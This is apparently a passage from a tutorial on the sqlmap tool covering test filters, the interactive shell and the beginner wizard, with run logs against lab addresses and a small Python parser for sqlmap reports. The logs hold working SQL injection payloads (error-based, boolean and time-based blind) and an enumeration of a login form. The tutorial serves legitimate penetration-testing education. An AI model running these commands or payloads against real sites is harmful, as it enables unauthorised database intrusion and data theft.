[xx:xx:14] [INFO] skipping GET parameter 'user'
[xx:xx:14] [INFO] testing if GET parameter 'id' is dynamic
[xx:xx:14] [INFO] confirming that GET parameter 'id' is dynamic
[xx:xx:14] [INFO] GET parameter 'id' is dynamic
[xx:xx:14] [WARNING] reflective value(s) found and filtering out
[xx:xx:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be
injectable (possible DBMS: 'MySQL')
[xx:xx:14] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] Y
[xx:xx:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[xx:xx:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[xx:xx:14] [INFO] testing 'MySQL inline queries'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[xx:xx:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[xx:xx:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[xx:xx:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[xx:xx:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[xx:xx:24] [INFO] ORDER BY technique seems to be usable. This should reduce the
time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[xx:xx:24] [INFO] target URL appears to have 3 columns in query
[xx:xx:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[...]
16. Using or skipping payloads by keyword
Parameter: --test-filter
If you only want to use the test payloads that contain the keyword "ROW", pass the parameter "--test-filter=ROW". Below is an example against a MySQL target:
python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW
[xx:xx:39] [INFO] GET parameter 'id' is dynamic
[xx:xx:39] [WARNING] reflective value(s) found and filtering out
[xx:xx:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[xx:xx:39] [INFO] testing for SQL injection on GET parameter 'id'
[xx:xx:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
[xx:xx:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
---
Parameter: --test-skip
If you do not want to use the test payloads that contain the keyword "BENCHMARK", pass the parameter "--test-skip=BENCHMARK".
17. Interactive Sqlmap shell
Parameter: --sqlmap-shell
This parameter opens an interactive Sqlmap shell that keeps a command history. For example:
[email protected]:~$ sqlmap --sqlmap-shell
___
__H__
___ ___[.]_____ ___ ___ {1.1.10#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
sqlmap-shell> -u "192.168.56.102"
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:22:46
[20:22:46] [INFO] testing connection to the target URL
[20:22:46] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:22:46] [INFO] testing if the target URL is stable
[20:22:47] [INFO] target URL is stable
[20:22:47] [CRITICAL] no parameter(s) found for testing in the provided data (e.g. GET parameter 'id' in 'www.site.com/index.php?id=1')
[*] shutting down at 20:22:47
___
__H__
___ ___[.]_____ ___ ___ {1.1.10#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
sqlmap-shell> exit
18. A simple wizard for beginners
Parameter: --wizard
Sqlmap provides a wizard for beginners whose workflow asks as few questions as possible. After entering the target, a user who simply presses Enter to accept the default answer at every step until the end of the workflow will still get a correct result. For example:
[email protected]:~$ sqlmap --wizard
___
__H__
___ ___["]_____ ___ ___ {1.1.10#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:39:41
[20:39:41] [INFO] starting wizard interface
Please enter full target URL (-u): http://192.168.56.102/login.php
POST data (--data) [Enter for None]: username=001&password=003
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 1
sqlmap is running, please wait..
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: username=001%' OR NOT 2143=2143#&password=003
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (comment)
Payload: username=001%' OR SLEEP(5)#&password=003
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0.12
banner: '5.5.50-0ubuntu0.14.04.1'
current user: '[email protected]'
current database: 'DSSchool'
current user is DBA: True
[*] shutting down at 20:40:07
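As an added example (not code from this page or from the sqlmap project), a small Python parser for the "injection points" report that sqlmap prints, handling both the older layout shown in section 16 (a separate "Place:" line) and the newer layout from the wizard run above ("Parameter: name (PLACE)", several techniques per parameter). It also includes a keyword filter that approximates --test-filter/--test-skip by matching the keyword case-insensitively against the test title and the payload; that matching rule is an assumption made here, and the two sample reports are constructed.

```python
import re
from collections import namedtuple
# One record per Type/Title/Payload triple; place is GET, POST, Cookie, ...
InjectionPoint = namedtuple("InjectionPoint", "place parameter kind title payload")

# Constructed sample in the older report layout (separate "Place:" line, one technique).
OLD_REPORT = """\
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
    Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*) FROM (SELECT 1)a)
---
"""
# Constructed sample in the newer layout ("Parameter: name (PLACE)", several techniques).
NEW_REPORT = """\
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
    Payload: username=001%' OR NOT 2143=2143#&password=003

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (comment)
    Payload: username=001%' OR SLEEP(5)#&password=003
---
"""

def parse_report(text):
    """Return one InjectionPoint per Type/Title/Payload triple in a sqlmap report."""
    points, place, param, cur = [], None, None, {}
    for line in (l.strip() for l in text.splitlines()):
        if m := re.match(r"Place:\s*(\w+)$", line):
            place = m.group(1)
        elif m := re.match(r"Parameter:\s*(\S+)(?:\s*\((\w+)\))?$", line):
            param, place = m.group(1), m.group(2) or place
        elif m := re.match(r"(Type|Title|Payload):\s*(.*)$", line):
            cur[m.group(1)] = m.group(2)
            if m.group(1) == "Payload":  # Payload is the last line of a triple
                points.append(InjectionPoint(place, param, cur["Type"], cur["Title"], cur["Payload"]))
                cur = {}
    return points

def keyword_filter(points, test_filter=None, test_skip=None):
    """--test-filter/--test-skip analogue (assumed): case-insensitive keyword in title or payload."""
    def hit(p, kw):
        return bool(kw) and re.search(re.escape(kw), p.title + " " + p.payload, re.I) is not None
    return [p for p in points if (not test_filter or hit(p, test_filter)) and not hit(p, test_skip)]
```

Feeding a real sqlmap run's output to parse_report gives a list you can sort or de-duplicate before writing a finding, and keyword_filter shows why "--test-filter=ROW" in section 16 still picked an error-based test whose title never mentions ROW: the keyword is in the payload.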
Summary
After reading the official Sqlmap manual in full, I finally have a fairly comprehensive understanding of Sqlmap. Before, I had only heard of it; now I have truly felt how powerful Sqlmap is, and I admire its two authors even more:
- Bernardo Damele A. G. (@inquisb)
- Miroslav Stampar (@stamparm)